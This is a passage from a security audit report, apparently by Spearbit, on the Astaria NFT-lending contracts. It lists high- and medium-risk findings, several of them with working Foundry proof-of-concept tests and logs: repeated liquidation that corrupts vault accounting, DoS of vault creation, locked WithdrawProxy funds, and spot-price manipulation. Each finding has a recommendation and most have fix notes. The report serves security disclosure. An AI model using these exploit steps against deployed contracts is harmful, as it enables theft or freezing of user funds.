expired stack/lien. Thus, when a lien expires, multiple adversaries can override many different parameters by calling this endpoint at will in the same block or different blocks till one of the created auctions settles (which might not as one can keep stacking these auctions with some delays to have a never-ending liquidation flow). Here is the list of storage parameters that can be manipulated: • s.collateralLiquidator[stack.lien.collateralId].amountOwed in LienToken: it is possible to keep in- creasing this value if we stack calls to the liquidate(...) with delays. • s.collateralLiquidator[stack.lien.collateralId].liquidator in LienToken: This can be overwritten and would hold the last liquidator's address and so only this liquidator can claim the NFT if the auction its corresponding auction does not settle and also it would receive the liquidation fees. • s.idToUnderlying[params.collateralId].auctionHash in CollateralToken: would hold the last created auction's order hash for the same expired lien backed by the same collateral. • slope in PublicVault: If the lien is taken from a public vault, each call to liquidate(...) would reduce this value. So we can make this slope really small. • s.epochData[epoch].liensOpenForEpoch in PublicVault: If the lien is taken from a public vault, each call to liquidate(...) would reduce this value. So we can make this slope really small or even 0 depends on the rate of this lien and the slope of the vault due to arithmetic underflows. • yIntercept in PublicVault: Mixing the manipulation of the vault's slope and stacking the calls to liqui- date(...) with delays we can also manipulate yIntercept. // add the following test case to: // file: src/test/LienTokenSettlementScenarioTest.t.sol function testScenario8() public { TestNFT nft = new TestNFT(2); address tokenContract = address(nft); uint256 tokenIdOne = uint256(0); uint256 tokenIdTwo = uint256(1); uint256 initialBalance = WETH9.balanceOf(address(this)); // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); // lend 20 ether to the PublicVault as address(1) _lendToVault( Lender({addr: address(1), amountToLend: 20 ether}), payable(publicVault) ); uint256 vaultShares = PublicVault(payable(publicVault)).totalSupply(); // borrow 10 eth against the dummy NFT with tokenId 0 (, ILienToken.Stack memory stackOne) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdOne, lienDetails: ILienToken.Details({ 10 maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); // borrow 10 eth against the dummy NFT with tokenId 1 (, ILienToken.Stack memory stackTwo) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdTwo, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); uint256 collateralIdOne = tokenContract.computeId(tokenIdOne); uint256 collateralIdTwo = tokenContract.computeId(tokenIdTwo); // verify the strategist has no shares minted assertEq( PublicVault(payable(publicVault)).balanceOf(strategistOne), 0, "Strategist has incorrect share balance" ); // verify that the borrower has the CollateralTokens assertEq( COLLATERAL_TOKEN.ownerOf(collateralIdOne), address(this), "CollateralToken not minted to borrower" ); assertEq( COLLATERAL_TOKEN.ownerOf(collateralIdTwo), address(this), "CollateralToken not minted to borrower" ); // fast forward to the end of the lien one vm.warp(block.timestamp + 10 days); address liquidatorOne = vm.addr(0x1195da7051); address liquidatorTwo = vm.addr(0x1195da7052); vm.label(liquidatorOne, "liquidator 1"); vm.label(liquidatorTwo, "liquidator 2"); // liquidate the first lien vm.startPrank(liquidatorOne); OrderParameters memory listedOrder = _liquidate(stackOne); vm.stopPrank(); 11 assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralIdOne), liquidatorOne, "liquidator is not stored in s.collateralLiquidator[collateralId]" ); // // liquidate the first lien with a different liquidator vm.startPrank(liquidatorTwo); listedOrder = _liquidate(stackOne); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralIdOne), liquidatorTwo, "liquidator is not stored in s.collateralLiquidator[collateralId]" ); // validate the slope is updated twice for the same expired lien // and so the accounting for the public vault is manipulated assertEq( PublicVault(payable(publicVault)).getSlope(), 0, "PublicVault slope divergent" ); // publicVault.storageSlot.epochData[epoch].liensOpenForEpoch is also dfecremented twice // CollateralToken.storageSlot.idToUnderlying[params.collateralId].auctionHash can also be ,! manipulated } Recommendation: When AstariaRouter.liquidate(...) is called make sure the expired lien/stack does not have any active liquidation auction before performing any actions. For example one can check the values of: • s.collateralLiquidator[stack.lien.collateralId].liquidator or • s.idToUnderlying[params.collateralId].auctionHash Astaria: Fixed in PR 333 by checking s.collateralLiquidator[stack.lien.collateralId].liquidator. Spearbit: Fixed. 5.2 High Risk +5.2.1 maxStrategistFee is incorrectly set in AstariaRouter's constructor Severity: High Risk Context: • AstariaRouter.sol#L111 • AstariaRouter.sol#L325-L329 • PublicVault.sol#L637-L641 Description: In AstariaRouter's constructor we set the maxStrategistFee as s.maxStrategistFee = uint256(50e17); // 5e18 But in the filing route we check that this value should not be greater than 1e18. 12 maxStrategistFee is supposed to set an upper bound for public vaults's strategist vault fee. When a payment is made for a lien, one calculates the shares to be minted for the strategist based on this value and the interest amount paid: function _handleStrategistInterestReward( VaultData storage s, uint256 interestPaid ) internal virtual { if (VAULT_FEE() != uint256(0) && interestPaid > 0) { uint256 fee = interestPaid.mulWadDown(VAULT_FEE()); uint256 feeInShares = convertToShares(fee); _mint(owner(), feeInShares); } } Note that we are using mulWadDown(...) here: F = j I (cid:1) f 1018k parameter description F f I fee VAULT_FEE() interestPaid so we would want f (cid:20) 1018. Currently, a vault could charge 5 times the interest paid. Recommendation: Perhaps s.maxStrategistFee needed to be set as 0.5 (cid:1) 1018 and not 5 (cid:1) 1018 s.maxStrategistFee = uint256(5e17); // 0.5 x 1e18, maximum 50% Astaria: Fixed in PR 336. Spearbit: Fixed. +5.2.2 When a vault is shutdown a user can still commit to liens using the vault Severity: High Risk Context: • AstariaRouter.sol#L864-L872 • VaultImplementation.sol#L142-L151 • VaultImplementation.sol#L61-L77 • VaultImplementation.sol#L153-L155 Description: When a vault is shutdown, one should not be able to take more liens using the funds from this vault. In the commit to lien flow, AstariaRouter fetches the state of the vault 13 ( , address delegate, address owner, , , // s.isShutdown uint256 nonce, bytes32 domainSeparator ) = IVaultImplementation(c.lienRequest.strategy.vault).getState(); But does not use the s.isShutdown flag to stop the flow if it is set to true. When a vault is shutdown we should have: vault endpoint reverts should revert deposit mint redeem withdraw redeemFutureEpoch payment flows liquidation flows commitToLien YES YES NO NO NO NO NO YES // add this test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol // Scenario 12: create vault > shutdown > commitToLien function testScenario12() public { { console2.log("--- test private vault shutdown ---"); uint256 ownerPK = uint256(0xa77ac3); address owner = vm.addr(ownerPK); vm.label(owner, "owner"); uint256 lienId; TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); address privateVault = _createPrivateVault(owner, owner); vm.label(privateVault, "privateVault"); console2.log("[+] private vault is created: %s", privateVault); // lend 1 wei to the privateVault _lendToPrivateVault( PrivateLender({addr: owner, amountToLend: 1 wei, token: address(WETH9)}), payable(privateVault) ); console2.log("[+] lent 1 wei to the private vault."); console2.log("[+] shudown private vault."); 14 vm.startPrank(owner); Vault(payable(privateVault)).shutdown(); vm.stopPrank(); assertEq( Vault(payable(privateVault)).getShutdown(), true, "Private Vault should be shutdown." ); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(privateVault), strategist: owner, strategistPK: ownerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: "" }); console2.log("[+] borrowed 1 wei against the private vault."); lienId: %s", lienId); console2.log(" owner of lienId: %s\n\n", LIEN_TOKEN.ownerOf(lienId)); console2.log(" assertEq( LIEN_TOKEN.ownerOf(lienId), owner, "owner should be the owner of the lienId." ); } { console2.log("--- test public vault shutdown ---"); uint256 ownerPK = uint256(0xa77ac322); address owner = vm.addr(ownerPK); vm.label(owner, "owner"); uint256 lienId; TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); address publicVault = _createPublicVault(owner, owner, 14 days); vm.label(publicVault, "publicVault"); console2.log("[+] public vault is created: %s", publicVault); // lend 1 wei to the publicVault _lendToVault( Lender({addr: owner, amountToLend: 1 ether}), payable(publicVault) ); 15 console2.log("[+] lent 1 ether to the public vault."); console2.log("[+] shudown public vault."); vm.startPrank(owner); Vault(payable(publicVault)).shutdown(); vm.stopPrank(); assertEq( Vault(payable(publicVault)).getShutdown(), true, "Public Vault should be shutdown." ); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(publicVault), strategist: owner, strategistPK: ownerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: "" }); console2.log("[+] borrowed 1 wei against the public vault."); console2.log(" console2.log(" lienId: %s", lienId); owner of lienId: %s", LIEN_TOKEN.ownerOf(lienId)); assertEq( LIEN_TOKEN.ownerOf(lienId), publicVault, "Public vault should be the owner of the lienId." ); } } forge t --mt testScenario12 --ffi -vvv: 16 --- test private vault shutdown --- [+] private vault is created: 0x7BF14E2ad40df80677D356099565a08011B72d66 [+] lent 1 wei to the private vault. [+] shudown private vault. [+] borrowed 1 wei against the private vault. lienId: 78113226609386929237635937490344951966356214732432064308195118046023211325984 owner of lienId: 0x60873Bc6F2C9333b465F60e461cf548EfFc7E6EA --- test public vault shutdown --- [+] public vault is created: 0x5b1A54d097AA8Ce673b6816577752F6dfc10Ddd6 [+] lent 1 ether to the public vault. [+] shudown public vault. [+] borrowed 1 wei against the public vault. lienId: 13217102800774263219074199159187108198090219420208960450275388834853683629020 owner of lienId: 0x5b1A54d097AA8Ce673b6816577752F6dfc10Ddd6 Recommendation: In _executeCommitment(...) use the isShutdown flag to revert committing to a vault that has been shutdown. Astaria: Fixed in PR 335. Spearbit: Fixed. +5.2.3 Vault creation can be DoSed by lien owners who can transfer their lien token to any address Severity: High Risk Context: • AstariaRouter.sol#L778-L792 • AstariaRouter.sol#L794-L796 • Vault.sol#L53-L58 Description: When a vault is created, AstoriaRouter uses the Create2ClonesWithImmutableArgs library to created a clone with immutable arguments: vaultAddr = Create2ClonesWithImmutableArgs.clone( s.BEACON_PROXY_IMPLEMENTATION, abi.encodePacked( address(this), vaultType, msg.sender, params.underlying, block.timestamp, params.epochLength, params.vaultFee, address(s.WETH) ), keccak256(abi.encodePacked(msg.sender, blockhash(block.number - 1))) ); One caveat of this creation decision is that the to be deployed vault address can be derived beforehand. Right after the creation of the vault, AstariaRouter checks whether the created vault owns any liens and if it does, it would revert: if (s.LIEN_TOKEN.balanceOf(vaultAddr) > 0) { revert InvalidVaultState(IAstariaRouter.VaultState.CORRUPTED); } 17 When liens are committed to, if the lien was taken from a private vault the private vault upon receiving the lien transfers the minted lien to the owner of the private vault: ERC721(msg.sender).safeTransferFrom( address(this), owner(), tokenId, data ); Combing all these facts a private vault's owner or any lien owners who can transfer their lien token to any address can DoS the vault creation process using the steps below: 1. Create a private vault (if already owning a lien jump to step 4.). 2. Deposit 1 wei into the private vault. 3. Commit to a lien 1 wei from the private vault. 4. The owner of the private vault front-runs and compute the to be deployed vault address and transfers its lien token to this address. 5. The vault creation process fails with InvalidVaultState(IAstariaRouter.VaultState.CORRUPTED). The cost of this attack would be 1 wei plus the associated gas fees. // add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol // Scenario 11: commitToLien -> send lien to a to-be-deployed vault function testScenario11() public { uint256 attackerPK = uint256(0xa77ac3); address attacker = vm.addr(attackerPK); vm.label(attacker, "attacker"); uint256 lienId; { TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); address privateVault = _createPrivateVault(attacker, attacker); vm.label(privateVault, "privateVault"); console2.log("[+] private vault is created: %s", privateVault); // lend 1 wei to the privateVault _lendToPrivateVault( PrivateLender({addr: attacker, amountToLend: 1 wei, token: address(WETH9)}), payable(privateVault) ); console2.log("[+] lent 1 wei to the private vault."); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(privateVault), strategist: attacker, strategistPK: attackerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ 18 maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: "" }); console2.log("[+] borrowed 1 wei against the private vault."); lienId: %s", lienId); console2.log(" owner of lienId: %s", LIEN_TOKEN.ownerOf(lienId)); console2.log(" assertEq( LIEN_TOKEN.ownerOf(lienId), attacker, "attacker should be the owner of the lienId." ); } address strategist = address(1); uint256 epochLength = 14 days; uint256 vaultFee = 1e17; { console2.log("[+] calculate the to-be-deployed public vault address."); bytes memory immutableData = abi.encodePacked( address(ASTARIA_ROUTER), uint8(1), // uint8(ImplementationType.PublicVault) strategist, address(WETH9), block.timestamp, epochLength, vaultFee, address(WETH9) ); bytes32 salt = keccak256(abi.encodePacked(strategist, blockhash(block.number - 1))); address toBeDeployedPublicvault = Create2ClonesWithImmutableArgs.deriveAddress( address(ASTARIA_ROUTER), ASTARIA_ROUTER.BEACON_PROXY_IMPLEMENTATION(), immutableData, salt ); console2.log(" toBeDeployedPublicvault address: %s", toBeDeployedPublicvault); vm.startPrank(attacker); LIEN_TOKEN.transferFrom(attacker, toBeDeployedPublicvault, lienId); vm.stopPrank(); console2.log("[+] lien transfered to the toBeDeployedPublicvault."); assertEq( LIEN_TOKEN.ownerOf(lienId), toBeDeployedPublicvault, "The owner of the lienId should be the toBeDeployedPublicvault." ); 19 assertEq( LIEN_TOKEN.balanceOf(toBeDeployedPublicvault), 1, "The lien balance of toBeDeployedPublicvault should be 1." ); } // create a PublicVault vm.startPrank(strategist); vm.expectRevert( abi.encodeWithSelector( IAstariaRouter.InvalidVaultState.selector, IAstariaRouter.VaultState.CORRUPTED ) ); address publicVault = payable( ASTARIA_ROUTER.newPublicVault( epochLength, // epoch length in [7, 45] days strategist, address(WETH9), vaultFee, // not greater than 5e17 false, new address[](0), uint256(0) ) ); vm.stopPrank(); console2.log("[+] Public vault creation fails with InvalidVaultState(VaultState.CORRUPTED)."); } forge t --mt testScenario11 --ffi -vvv: Logs: [+] private vault is created: 0x7BF14E2ad40df80677D356099565a08011B72d66 [+] lent 1 wei to the private vault. [+] borrowed 1 wei against the private vault. lienId: 78113226609386929237635937490344951966356214732432064308195118046023211325984 owner of lienId: 0x60873Bc6F2C9333b465F60e461cf548EfFc7E6EA [+] calculate the to-be-deployed public vault address. toBeDeployedPublicvault address: 0xe9B9495b2A6b71A871b981A5Effa56575f872A31 [+] lien transfered to the toBeDeployedPublicvault. [+] Public vault creation fails with InvalidVaultState(VaultState.CORRUPTED). This issue was introduced in commit 04c6ea. diff --git a/src/AstariaRouter.sol b/src/AstariaRouter.sol index cfa76f1..bd18a84 100644 --- a/src/AstariaRouter.sol +++ b/src/AstariaRouter.sol @@ -20,10 +20,9 @@ import {SafeTransferLib} from "solmate/utils/SafeTransferLib.sol"; import {ERC721} from "solmate/tokens/ERC721.sol"; import {ITransferProxy} from "core/interfaces/ITransferProxy.sol"; import {SafeCastLib} from "gpl/utils/SafeCastLib.sol"; - import { ClonesWithImmutableArgs - -} from "clones-with-immutable-args/ClonesWithImmutableArgs.sol"; + Create2ClonesWithImmutableArgs 20 +} from "create2-clones-with-immutable-args/Create2ClonesWithImmutableArgs.sol"; import {CollateralLookup} from "core/libraries/CollateralLookup.sol"; @@ -721,7 +720,7 @@ contract AstariaRouter is } //immutable data vaultAddr = ClonesWithImmutableArgs.clone( vaultAddr = Create2ClonesWithImmutableArgs.clone( - + s.BEACON_PROXY_IMPLEMENTATION, abi.encodePacked( address(this), @@ -731,9 +730,13 @@ contract AstariaRouter is block.timestamp, epochLength, vaultFee - + + + + + ) ), keccak256(abi.encode(msg.sender, blockhash(block.number - 1))) ); if (s.LIEN_TOKEN.balanceOf(vaultAddr) > 0) { revert InvalidVaultState(IAstariaRouter.VaultState.CORRUPTED); } //mutable data IVaultImplementation(vaultAddr).init( IVaultImplementation.InitParams({ To address two of the finding from the Code4rena audit: • code-423n4/2023-01-astaria-findings/issues/246. • code-423n4/2023-01-astaria-findings/issues/571. +5.2.4 WithdrawProxy funds can be locked Severity: High Risk Context: • WithdrawProxy.sol#L291-L293 • WithdrawProxy.sol#L329 • WithdrawProxy.sol#L383 • PublicVault.sol#L349 Description: If flash liens are allowed by a public vault, one call lockup the to be redeemed funds of a Withdraw- Proxy by sandwiching a call to processEpoch(). This attack goes as follows: 1. Assume the current epoch is e1. A public vault lender request to withdraw at e1 which causes W the withdraw proxy for this epoch to be deployed and let time pass. 2. Someone opens a lien and gets liquidated during this epoch such that its auction ends pass the next epoch e2 so that W 's finalAuctionEnd becomes non-zero and let time pass. 3. Process e1 so that the current epoch to be processed next would be e2. 4. Open a new lien for 1 wei with 0 duration. 5. Instantly process e2. At this point the claim() endpoint would be called on W to reset finalAuctionEnd to 0. At this point the current epoch would be e3. 21 6. Back-run and instantly liquidate the lien created in step 4 to set W 's finalAuctionEnd to a non-zero value again. Since W 's claim() endpoint is the only endpoint that resets finalAuctionEnd to 0 and this endpoint can only be called when the current epoch is the claimable epoch for W which is e2, finalAuctionEnd would cannot be able to be reset to 0 anymore as the epoch only increase in value. And so since the redeem and withdraw endpoints of the WithdrawProxy are guarded by the onlyWhenNoActiveAuction() modifier: modifier onlyWhenNoActiveAuction() { WPStorage storage s = _loadSlot(); // If auction funds have been collected to the WithdrawProxy // but the PublicVault hasn't claimed its share, too much money will be sent to LPs if (s.finalAuctionEnd != 0) { // if finalAuctionEnd is 0, no auctions were added revert InvalidState(InvalidStates.NOT_CLAIMED); } _; } The W shareholders would not be able to exit their shares. All shares are locked unless the protocol admin pushes updates to the current implementation. // add the following test case to: // file: src/test/LienTokenSettlementScenarioTest.t.sol // make sure to also add the following import // import { // // } from "core/WithdrawProxy.sol"; WithdrawProxy // Scenario 10: commitToLien -> liquidate w/ WithdrawProxy -> ... function testScenario10() public { TestNFT nft = new TestNFT(2); address tokenContract = address(nft); uint256 tokenIdOne = uint256(0); uint256 tokenIdTwo = uint256(1); // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); address lender = address(1); vm.label(lender, "lender"); // lend 10 ether to the PublicVault as address(1) _lendToVault( Lender({addr: lender, amountToLend: 10 ether}), payable(publicVault) ); address lender2 = address(2); vm.label(lender2, "lender"); // lend 10 ether to the PublicVault as address(2) _lendToVault( Lender({addr: lender2, amountToLend: 10 ether}), payable(publicVault) ); 22 // skip 1 epoch skip(14 days); _signalWithdrawAtFutureEpoch( lender, payable(publicVault), 1 // epoch to redeem ); { console2.log("\n--- process epoch ---"); PublicVault(payable(publicVault)).processEpoch(); // current epoch should be 1 uint256 currentEpoch = PublicVault(payable(publicVault)).getCurrentEpoch(); emit log_named_uint("currentEpoch", currentEpoch); assertEq( currentEpoch, 1, "The current epoch should be 1" ); } skip(1 days); // borrow 5 eth against the dummy NFT (, ILienToken.Stack memory stackOne) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdOne, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 11 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 5 ether }); // uint256 collateralId = tokenContract.computeId(tokenId); skip(11 days); OrderParameters memory listedOrderOne = _liquidate(stackOne); IWithdrawProxy withdrawProxy = PublicVault(payable(publicVault)) .getWithdrawProxy(1); { ( uint256 withdrawRatio, uint256 expected, uint40 finalAuctionEnd, uint256 withdrawReserveReceived ) = withdrawProxy.getState(); emit log_named_uint("finalAuctionEnd @ e_1", finalAuctionEnd); 23 } { skip(2 days); console2.log("\n--- process epoch ---"); PublicVault(payable(publicVault)).processEpoch(); // current epoch should be 2 uint256 currentEpoch = PublicVault(payable(publicVault)).getCurrentEpoch(); emit log_named_uint("currentEpoch", currentEpoch); assertEq( currentEpoch, 2, "The current epoch should be 2" } { ); ( uint256 withdrawRatio, uint256 expected, uint40 finalAuctionEnd, uint256 withdrawReserveReceived ) = withdrawProxy.getState(); uint256 withdrawReserve = PublicVault(payable(publicVault)).getWithdrawReserve(); emit log_named_uint("finalAuctionEnd @ e_1", finalAuctionEnd); emit log_named_uint("withdrawReserve", withdrawReserve); } { } { } PublicVault(payable(publicVault)).transferWithdrawReserve(); uint256 withdrawReserve = PublicVault(payable(publicVault)).getWithdrawReserve(); emit log_named_uint("withdrawReserve", withdrawReserve); // allow flash liens - liens that can be liquidated in the same block that was committed IAstariaRouter.File[] memory files = new IAstariaRouter.File[](1); files[0] = IAstariaRouter.File( IAstariaRouter.FileType.MinLoanDuration, abi.encode(uint256(0)) ); ASTARIA_ROUTER.fileBatch(files); // borrow 5 eth against the dummy NFT (, ILienToken.Stack memory stackTwo) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdTwo, lienDetails: ILienToken.Details({ maxAmount: 50 ether, 24 rate: (uint256(1e16) * 150) / (365 days), duration: 0 seconds, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 wei }), amount: 1 wei }); { skip(14 days); console2.log("\n--- process epoch ---"); PublicVault(payable(publicVault)).processEpoch(); // current epoch should be 3 uint256 currentEpoch = PublicVault(payable(publicVault)).getCurrentEpoch(); emit log_named_uint("currentEpoch", currentEpoch); assertEq( currentEpoch, 3, "The current epoch should be 3" ); ( uint256 withdrawRatio, uint256 expected, uint40 finalAuctionEnd, uint256 withdrawReserveReceived ) = withdrawProxy.getState(); // finalAuctionEnd will be non-zero emit log_named_uint("finalAuctionEnd @ e_1", finalAuctionEnd); } console2.log("\n--- liquidate the flash lien corresponding to epoch 1 ---"); OrderParameters memory listedOrderTwo = _liquidate(stackTwo); { ( uint256 withdrawRatio, uint256 expected, uint40 finalAuctionEnd, uint256 withdrawReserveReceived ) = withdrawProxy.getState(); // finalAuctionEnd will be non-zero emit log_named_uint("finalAuctionEnd @ e_1", finalAuctionEnd); } // at this point `claim()` cannot be called for `withdrawProxy` since // the current epoch does not equal to `2` which is the CLAIMABLE_EPOCH() // for this withdraw proxy. and in fact it will never be since its current value // is `3` and its value never decreases. This means `finalAuctionEnd` will never // be reset to `0` and so `redeem` and `withdraw` endpoints cannot be called // and the lender funds are locked in `withdrawProxy`. { 25 uint256 lenderShares = withdrawProxy.balanceOf(lender); vm.expectRevert( abi.encodeWithSelector(WithdrawProxy.InvalidState.selector, ,! WithdrawProxy.InvalidStates.NOT_CLAIMED) ); uint256 redeemedAssets = withdrawProxy.redeem(lenderShares, lender, lender); } } 5.3 Medium Risk +5.3.1 transfer(...) function in _issuePayout(...) can be replaced by a direct call Severity: Medium Risk Context: • VaultImplementation.sol#L245 Description: In the _issuePayout(...) internal function of the VaultImplementation if the asset is WETH the amount is withdrawn from WETH to native tokens and then transfered to the borrower: if (asset() == WETH()) { IWETH9 wethContract = IWETH9(asset()); wethContract.withdraw(newAmount); payable(borrower).transfer(newAmount); } transfer limits the amount of gas shared to the call to the borrower which would prevent executing a complex callback and due to changes in gas prices in EVM it might even break some feature for a potential borrower contract. For the analysis of the flow for both types of vaults please refer to the following issue: • 'Storage parameters are updated after a few callback sites to external addresses in the commitToLien(...) flow' Recommendation: call the borrower directly without restricting the gas shared and only apply this recommen- dation if the recommendation from issue 'Storage parameters are updated after a few callback sites to external addresses in the commitToLien(...) flow' is applied. +5.3.2 Storage parameters are updated after a few callback sites to external addresses in the commit- ToLien(...) flow Severity: Medium Risk Context: • VaultImplementation.sol#L245 • LienToken.sol#L226 • PublicVault.sol#L686 • PublicVault.sol#L690 • VaultImplementation.sol#L230-L249 • VaultImplementation.sol#L221 • Vault.sol#L53-L58 Description: In the commitToLien(...) flow the following storage parameters are updated after some of the external call back sites when payout is issued or a lien is transferred from a private vault to its owner: 26 • collateralStateHash in LienToken: One can potentially re-enter to take another lien using the same col- lateral, but this is not possible since the collateral NFT token is already transferred to the CollateralToken (unless one is dealing with some esoteric NFT token). The createLien(...) requires this parameter to be 0., and that's why a potential re-entrancy can bypass this requirement. | Read re-entrancy: Yes • slope in PublicVault: - | Read re-entrancy: Yes • liensOpenForEpoch in PublicVault: If flash liens are allowed one can re-enter and process the epoch before finishing the commitToLien(...). And so the processed epoch would have open liens even though we would want to make sure this could not happen | Read re-entrancy: Yes The re-entrancies can happen if the vault asset performs a call back to the receiver when transferring tokens (during issuance of payouts). And if one is dealing with WETH, the native token amount is transfer(...) to the borrower. Note in the case of Native tokens if the following recommendation from the below issue is considered the current issue could be of higher risk: • 'transfer(...) function in _issuePayout(...) can be replaced by a direct call' Recommendation: Make sure all the storage parameter updates are performed first before the calls to potentially external contracts. The following changes are required: 1. update the collateralStateHash before minting a lien for the vault: diff --git a/src/LienToken.sol b/src/LienToken.sol index d22b459..e61d9dc 100644 --- a/src/LienToken.sol +++ b/src/LienToken.sol @@ -220,17 +220,16 @@ contract LienToken is ERC721, ILienToken, AuthInitializable, AmountDeriver { revert InvalidSender(); } (lienId, newStack) = _createLien(s, params); (newStack) = _createLien(s, params); owingAtEnd = _getOwed(newStack, newStack.point.end); s.collateralStateHash[params.lien.collateralId] = bytes32(lienId); emit NewLien(params.lien.collateralId, newStack); - + - } function _createLien( LienStorage storage s, ILienToken.LienActionEncumber calldata params - + ) internal returns (uint256 newLienId, ILienToken.Stack memory newSlot) { ) internal returns (ILienToken.Stack memory newSlot) { uint40 lienEnd = (block.timestamp + params.lien.details.duration) .safeCastTo40(); Point memory point = Point({ @@ -241,6 +240,8 @@ contract LienToken is ERC721, ILienToken, AuthInitializable, AmountDeriver { newSlot = Stack({lien: params.lien, point: point}); newLienId = uint256(keccak256(abi.encode(newSlot))); s.collateralStateHash[params.lien.collateralId] = bytes32(newLienId); + + _safeMint( params.receiver, newLienId, 2. For public vaults first add the lien then issue payout: 27 diff --git a/src/PublicVault.sol b/src/PublicVault.sol index 654d8b1..c26c7b7 100644 --- a/src/PublicVault.sol +++ b/src/PublicVault.sol @@ -487,8 +487,8 @@ contract PublicVault is VaultImplementation, IPublicVault, ERC4626Cloned { (address, uint256, uint40, uint256, address, uint256) ); - + _issuePayout(borrower, amount, feeTo, feeRake); _addLien(tokenId, lienSlope, lienEnd); _issuePayout(borrower, amount, feeTo, feeRake); } return IERC721Receiver.onERC721Received.selector; +5.3.3 UNI_V3Validator fetches spot prices that may lead to price manipulation attacks Severity: Medium Risk Context: UNI_V3Validator.sol#L126-L130 Description: UNI_V3Validator.validateAndParse() checks the state of the Uniswap V3 position. This includes checking the LP value through LiquidityAmounts.getAmountsForLiquidity. //get pool state //get slot 0 (uint160 poolSQ96, , , , , , ) = IUniswapV3PoolState( V3_FACTORY.getPool(token0, token1, fee) ).slot0(); (uint256 amount0, uint256 amount1) = LiquidityAmounts .getAmountsForLiquidity( poolSQ96, TickMath.getSqrtRatioAtTick(tickLower), TickMath.getSqrtRatioAtTick(tickUpper), liquidity ); • LiquidityAmounts.sol#L177-L221 When we deep dive into getAmountsForLiquidity, we see three cases. Price is below the range, price is within the range, and price is above the range. 28 function getAmountsForLiquidity( uint160 sqrtRatioX96, uint160 sqrtRatioAX96, uint160 sqrtRatioBX96, uint128 liquidity ) internal pure returns (uint256 amount0, uint256 amount1) { unchecked { if (sqrtRatioAX96 > sqrtRatioBX96) (sqrtRatioAX96, sqrtRatioBX96) = (sqrtRatioBX96, sqrtRatioAX96); if (sqrtRatioX96 <= sqrtRatioAX96) { amount0 = getAmount0ForLiquidity( sqrtRatioAX96, sqrtRatioBX96, liquidity ); } else if (sqrtRatioX96 < sqrtRatioBX96) { amount0 = getAmount0ForLiquidity( sqrtRatioX96, sqrtRatioBX96, liquidity ); amount1 = getAmount1ForLiquidity( sqrtRatioAX96, sqrtRatioX96, liquidity ); } else { amount1 = getAmount1ForLiquidity( sqrtRatioAX96, sqrtRatioBX96, liquidity ); } } } For simplicity, we can break into getAmount1ForLiquidity 29 /// @notice Computes the amount of token1 for a given amount of liquidity and a price range /// @param sqrtRatioAX96 A sqrt price representing the first tick boundary /// @param sqrtRatioBX96 A sqrt price representing the second tick boundary /// @param liquidity The liquidity being valued /// @return amount1 The amount of token1 function getAmount1ForLiquidity( uint160 sqrtRatioAX96, uint160 sqrtRatioBX96, uint128 liquidity ) internal pure returns (uint256 amount1) { unchecked { if (sqrtRatioAX96 > sqrtRatioBX96) (sqrtRatioAX96, sqrtRatioBX96) = (sqrtRatioBX96, sqrtRatioAX96); return FullMathUniswap.mulDiv( liquidity, sqrtRatioBX96 - sqrtRatioAX96, FixedPoint96.Q96 ); } } is calculated as amount = liquidity * (upper price - lower price). When the We find the amount slot0.poolSQ96 is in lp range, the lower price is the slot0.poolSQ96, the closer slot0 is to lowerTick, the smaller the amount1 is. This is vulnerable to price manipulation attacks as IUniswapV3PoolState.slot0.poolSQ96 is effectively the spot price. Attackers can acquire huge funds through flash loans and shift theslot0 by doing large swaps on Uniswap. Assume the following scenario, the strategist sign a lien that allows the borrower to provide ETH-USDC position with > 1,000,000 USDC and borrow 1,000,000 USDC from the vault. • Attacker can first provides 1 ETH worth of lp at price range 2,000,000 ~ 2,000,001. • The attacker borrows flash loan to manipulate the price of the pool and now the slot0.poolSQ96 = sqrt(2,000,000). (ignoring the decimals difference. • getAmountsForLiquidity value the LP positions with the spot price, and find the LP has 1 * 2,000,000 USDC in the position. The attacker borrows 2,000,000 • Restoring the price of Uniswap pool and 